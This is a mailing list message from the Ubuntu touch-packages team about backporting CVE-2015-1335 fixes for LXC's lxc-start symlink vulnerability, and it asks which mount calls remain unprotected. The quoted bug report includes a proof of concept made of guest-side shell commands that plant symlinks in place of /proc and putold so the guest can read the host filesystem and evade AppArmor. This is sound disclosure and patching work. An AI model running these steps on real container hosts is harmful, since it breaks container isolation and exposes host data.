touch-packages team mailing list archive
-
touch-packages team
-
Mailing list archive
-
Message #126395
Re: [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Hi Serge,
sorry for getting back to this so late.
On Di 08 Dez 2015 17:08:58 CET, Serge Hallyn wrote:
> Quoting Mike Gabriel (mike.gabriel@xxxxxxxxxxxxxxxxxxx):
>> today I worked on backporting available fixes for CVE-2015-1335 to LXC
>> 0.7.x (as found in Debian squeeze-lts).
>>
>> The patch is attached, I am still in the testing-for-regressions phase.
>> Can any of the LXC devs take a look at the patch and maybe see if it is
>> suitable for Ubuntu 12.04, as well?
>
> Hi,
>
> So the thing to look for is any unconverted "mount" calls. It
> looks like the lxc_setup_fs() calls to mount_fs() are not being
> protected. So the contianer admin could attack through a /proc
> symlink.
Hmmm... ok...
I just checked upstream Git and the location you refer to is not using
safe_mount either there [1]
Furthermore, it seems non-trivial to inform safe_mount about the root
path from within lxc_init.c.
Do you have any input on the following questions?:
o Why mount_fs() in latest HEAD still using the mount() call
instead of safe_mount()?
o How could one pipe the rootfs path into lxc_setup_fs() -> mount_fs()?
Thanks for any input.
Mike
[1] https://github.com/lxc/lxc/blob/master/src/lxc/initutils.c#L35
--
DAS-NETZWERKTEAM
mike gabriel, herweg 7, 24357 fleckeby
fon: +49 (1520) 1976 148
GnuPG Key ID 0x25771B31
mail: mike.gabriel@xxxxxxxxxxxxxxxxxxx, http://das-netzwerkteam.de
freeBusy:
https://mail.das-netzwerkteam.de/mailxchange/kronolith/fb.php?u=m.gabriel%40das-netzwerkteam.de
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662
Title:
lxc-start symlink vulnerabilities may allow guest to read host
filesystem, interfere with apparmor
Status in lxc package in Ubuntu:
Fix Released
Bug description:
lxc-start shuffles around mounts using helper directory
/usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
It then modifies mounts operating in guest root directory before
invoking init. As it does not check if all mount points are
directories, a malicious guest may modify its internal structure
before shutdown (or was created using manipulated image) and then when
started again, guest may
* Access the whole host root filesystem
* Block switching from lxc-start apparmor profile to lxc-container-
default
# Real putold before pivot-root (root fs will end here)
mkdir -p /x/lxc_putold
# Faked putold
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
# proc fake
mkdir -p /x/proc
umount /proc
rmdir /proc
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
The issue was also found during
https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions
Follow ups
References
